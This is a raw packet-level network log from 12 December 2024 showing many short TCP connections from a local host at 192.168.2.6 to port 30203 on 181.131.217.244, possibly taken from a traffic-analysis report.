Dec 12, 2024 17:35:17.085984945 CET	49865	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:17.095350981 CET	30203	49860	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:17.095412016 CET	49860	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:17.205885887 CET	30203	49865	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:17.205945969 CET	49865	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:17.325819969 CET	30203	49865	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:18.415410995 CET	30203	49865	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:18.415616035 CET	49865	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:18.415663958 CET	49865	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:18.523387909 CET	49869	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:18.535492897 CET	30203	49865	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:18.643471003 CET	30203	49869	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:18.643732071 CET	49869	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:18.644463062 CET	49869	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:18.764204025 CET	30203	49869	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:18.764369965 CET	49869	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:18.884494066 CET	30203	49869	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:20.109534025 CET	30203	49869	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:20.109812021 CET	49869	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:20.109812021 CET	49869	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:20.226449013 CET	49874	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:20.229594946 CET	30203	49869	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:20.346297026 CET	30203	49874	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:20.346421957 CET	49874	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:20.347170115 CET	49874	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:20.467931032 CET	30203	49874	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:20.468066931 CET	49874	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:20.587970972 CET	30203	49874	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:21.686427116 CET	30203	49874	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:21.686611891 CET	49874	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:21.686686039 CET	49874	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:21.788767099 CET	49877	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:21.806622982 CET	30203	49874	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:21.909904957 CET	30203	49877	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:21.910203934 CET	49877	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:21.910890102 CET	49877	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:22.031316042 CET	30203	49877	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:22.031599045 CET	49877	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:22.151381969 CET	30203	49877	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:23.233707905 CET	30203	49877	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:23.233922005 CET	49877	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:23.233922005 CET	49877	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:23.353858948 CET	49883	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:23.355353117 CET	30203	49877	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:23.474486113 CET	30203	49883	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:23.474620104 CET	49883	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:23.485876083 CET	49883	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:23.605649948 CET	30203	49883	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:23.605705976 CET	49883	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:23.726289034 CET	30203	49883	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:24.794279099 CET	30203	49883	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:24.794359922 CET	49883	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:24.794531107 CET	49883	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:24.898422003 CET	49888	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:24.914371014 CET	30203	49883	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:25.018582106 CET	30203	49888	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:25.018686056 CET	49888	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:25.019525051 CET	49888	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:25.139386892 CET	30203	49888	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:25.139444113 CET	49888	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:25.259334087 CET	30203	49888	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:26.348932028 CET	30203	49888	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:26.349458933 CET	49888	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:26.350533962 CET	49888	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:26.461230040 CET	49893	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:26.470227003 CET	30203	49888	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:26.581835985 CET	30203	49893	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:26.581923008 CET	49893	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:26.582971096 CET	49893	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:26.702967882 CET	30203	49893	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:26.703016043 CET	49893	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:26.822932959 CET	30203	49893	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:27.930782080 CET	30203	49893	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:27.935857058 CET	49893	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:27.936038971 CET	49893	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:28.038794041 CET	49897	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:28.055850983 CET	30203	49893	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:28.159290075 CET	30203	49897	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:28.159529924 CET	49897	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:28.160123110 CET	49897	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:28.280070066 CET	30203	49897	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:28.280666113 CET	49897	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:28.400723934 CET	30203	49897	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:29.766308069 CET	30203	49897	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:29.766464949 CET	49897	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:29.766639948 CET	49897	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:29.882953882 CET	49903	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:29.886446953 CET	30203	49897	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:30.003065109 CET	30203	49903	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:30.003160954 CET	49903	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:30.003870964 CET	49903	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:30.123800039 CET	30203	49903	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:30.123976946 CET	49903	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:30.247819901 CET	30203	49903	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:31.377384901 CET	30203	49903	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:31.377623081 CET	49903	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:31.377825022 CET	49903	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:31.492254972 CET	49907	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:31.497698069 CET	30203	49903	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:31.613429070 CET	30203	49907	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:31.613626003 CET	49907	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:31.614351034 CET	49907	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:31.734709024 CET	30203	49907	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:31.734878063 CET	49907	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:31.854659081 CET	30203	49907	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:32.985481024 CET	30203	49907	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:32.985553980 CET	49907	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:32.985707045 CET	49907	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:33.101767063 CET	49912	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:33.106703043 CET	30203	49907	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:33.221920967 CET	30203	49912	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:33.222168922 CET	49912	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:33.222771883 CET	49912	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:33.344726086 CET	30203	49912	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:33.344855070 CET	49912	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:33.465742111 CET	30203	49912	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:34.602920055 CET	30203	49912	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:34.604721069 CET	49912	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:34.604932070 CET	49912	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:34.710736036 CET	49916	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:34.724756956 CET	30203	49912	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:34.831722975 CET	30203	49916	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:34.833302021 CET	49916	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:34.833586931 CET	49916	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:34.953439951 CET	30203	49916	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:34.956757069 CET	49916	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:35.076679945 CET	30203	49916	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:36.189145088 CET	30203	49916	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:36.189296007 CET	49916	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:36.189532995 CET	49916	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:36.304502964 CET	49922	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:36.309259892 CET	30203	49916	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:36.424345970 CET	30203	49922	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:36.424530029 CET	49922	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:36.425225019 CET	49922	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:36.545087099 CET	30203	49922	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:36.545239925 CET	49922	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:36.665483952 CET	30203	49922	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:37.803360939 CET	30203	49922	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:37.804626942 CET	49922	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:37.805474997 CET	49922	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:37.916016102 CET	49926	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:37.926230907 CET	30203	49922	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:38.037339926 CET	30203	49926	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:38.037545919 CET	49926	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:38.038278103 CET	49926	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:38.157965899 CET	30203	49926	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:38.158041954 CET	49926	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:38.278425932 CET	30203	49926	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:39.400996923 CET	30203	49926	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:39.401299000 CET	49926	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:39.401345968 CET	49926	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:39.507750034 CET	49929	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:39.521188974 CET	30203	49926	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:39.628478050 CET	30203	49929	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:39.628541946 CET	49929	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:39.629163980 CET	49929	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:39.748953104 CET	30203	49929	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:39.749037981 CET	49929	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:39.869052887 CET	30203	49929	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:41.038964987 CET	30203	49929	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:41.039041042 CET	49929	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:41.039165020 CET	49929	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:41.148274899 CET	49934	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:41.159060955 CET	30203	49929	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:41.268193960 CET	30203	49934	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:41.268635988 CET	49934	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:41.269859076 CET	49934	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:41.389703035 CET	30203	49934	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:41.389774084 CET	49934	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:41.509582043 CET	30203	49934	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:42.628946066 CET	30203	49934	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:42.629045963 CET	49934	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:42.629213095 CET	49934	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:42.741945028 CET	49939	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:42.749051094 CET	30203	49934	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:42.861720085 CET	30203	49939	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:42.861797094 CET	49939	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:42.862632990 CET	49939	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:42.983949900 CET	30203	49939	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:42.983999014 CET	49939	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:43.103764057 CET	30203	49939	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:46.242506027 CET	49939	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:46.362199068 CET	30203	49939	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:46.362287998 CET	49939	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:46.482098103 CET	30203	49939	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:47.085711002 CET	49939	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:47.206254005 CET	30203	49939	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:47.206310987 CET	49939	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:47.326141119 CET	30203	49939	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:49.929639101 CET	49939	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:50.050688982 CET	30203	49939	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:50.050749063 CET	49939	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:50.170728922 CET	30203	49939	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:51.398514032 CET	49939	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:51.518377066 CET	30203	49939	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:51.518428087 CET	49939	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:51.639460087 CET	30203	49939	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:53.451674938 CET	30203	49939	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:53.451739073 CET	49939	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:53.451952934 CET	49939	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:53.554584026 CET	49965	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:53.572020054 CET	30203	49939	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:53.674643993 CET	30203	49965	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:53.674743891 CET	49965	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:53.675559044 CET	49965	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:53.795486927 CET	30203	49965	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:53.795572996 CET	49965	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:53.916349888 CET	30203	49965	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:55.031039000 CET	30203	49965	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:55.031151056 CET	49965	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:55.031341076 CET	49965	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:55.148304939 CET	49969	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:55.151061058 CET	30203	49965	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:55.270334959 CET	30203	49969	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:55.270443916 CET	49969	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:55.274854898 CET	49969	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:55.394840956 CET	30203	49969	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:55.394937038 CET	49969	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:55.516072035 CET	30203	49969	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:56.675115108 CET	30203	49969	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:56.675380945 CET	49969	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:56.675563097 CET	49969	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:56.788990974 CET	49975	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:56.795908928 CET	30203	49969	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:56.908957005 CET	30203	49975	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:56.909354925 CET	49975	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:56.910037041 CET	49975	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:57.029721975 CET	30203	49975	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:57.029941082 CET	49975	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:57.149754047 CET	30203	49975	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:58.279052973 CET	30203	49975	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:58.279119968 CET	49975	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:58.280793905 CET	49975	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:58.400154114 CET	49979	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:58.400501966 CET	30203	49975	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:58.520106077 CET	30203	49979	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:58.520292044 CET	49979	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:58.521084070 CET	49979	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:58.640777111 CET	30203	49979	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:58.640882969 CET	49979	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:58.760756969 CET	30203	49979	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:59.875530958 CET	30203	49979	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:59.875602961 CET	49979	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:59.875777006 CET	49979	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:59.992094040 CET	49984	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:59.995558977 CET	30203	49979	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:00.111912966 CET	30203	49984	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:00.112075090 CET	49984	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:00.112763882 CET	49984	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:00.232491016 CET	30203	49984	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:00.232595921 CET	49984	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:00.352543116 CET	30203	49984	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:01.587424994 CET	30203	49984	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:01.587502956 CET	49984	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:01.587704897 CET	49984	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:01.695908070 CET	49988	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:01.707515001 CET	30203	49984	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:01.816884995 CET	30203	49988	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:01.816967010 CET	49988	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:01.817859888 CET	49988	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:01.938199997 CET	30203	49988	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:01.938261986 CET	49988	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:02.058032990 CET	30203	49988	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:03.241703033 CET	30203	49988	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:03.241828918 CET	49988	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:03.241959095 CET	49988	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:03.351505041 CET	49993	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:03.364725113 CET	30203	49988	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:03.472146034 CET	30203	49993	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:03.472266912 CET	49993	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:03.474153996 CET	49993	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:03.594799995 CET	30203	49993	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:03.594861031 CET	49993	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:03.714886904 CET	30203	49993	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:13.959425926 CET	30203	49993	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:13.959594965 CET	49993	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:13.959692001 CET	49993	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:14.070528030 CET	50018	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:14.079632044 CET	30203	49993	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:14.190625906 CET	30203	50018	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:14.190834999 CET	50018	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:14.191757917 CET	50018	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:14.314551115 CET	30203	50018	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:14.314624071 CET	50018	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:14.436794996 CET	30203	50018	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:15.821480036 CET	30203	50018	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:15.821533918 CET	50018	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:15.821873903 CET	50018	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:15.941538095 CET	30203	50018	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:16.008876085 CET	50024	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:16.128747940 CET	30203	50024	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:16.128839016 CET	50024	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:16.156847000 CET	50024	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:16.276640892 CET	30203	50024	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:16.276693106 CET	50024	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:16.396469116 CET	30203	50024	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:16.523216009 CET	50024	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:16.643198967 CET	30203	50024	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:16.643276930 CET	50024	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:16.763062000 CET	30203	50024	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:17.496949911 CET	30203	50024	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:17.497119904 CET	50024	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:17.497211933 CET	50024	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:17.601744890 CET	50029	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:17.617237091 CET	30203	50024	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:17.721554995 CET	30203	50029	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:17.721858978 CET	50029	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:17.722526073 CET	50029	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:17.842348099 CET	30203	50029	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:17.842410088 CET	50029	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:17.962277889 CET	30203	50029	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:19.153986931 CET	30203	50029	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:19.154134035 CET	50029	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:19.154366970 CET	50029	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:19.258239031 CET	50032	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:19.274230957 CET	30203	50029	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:19.378010035 CET	30203	50032	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:19.378170013 CET	50032	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:19.379457951 CET	50032	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:19.501331091 CET	30203	50032	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:19.501444101 CET	50032	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:19.621155024 CET	30203	50032	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:20.879395962 CET	30203	50032	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:20.879888058 CET	50032	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:20.879997015 CET	50032	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:20.992165089 CET	50037	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:20.999653101 CET	30203	50032	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:21.111973047 CET	30203	50037	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:21.112128973 CET	50037	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:21.112900972 CET	50037	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:21.232753992 CET	30203	50037	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:21.232913017 CET	50037	30203	192.168.2.6	181.131.217.244
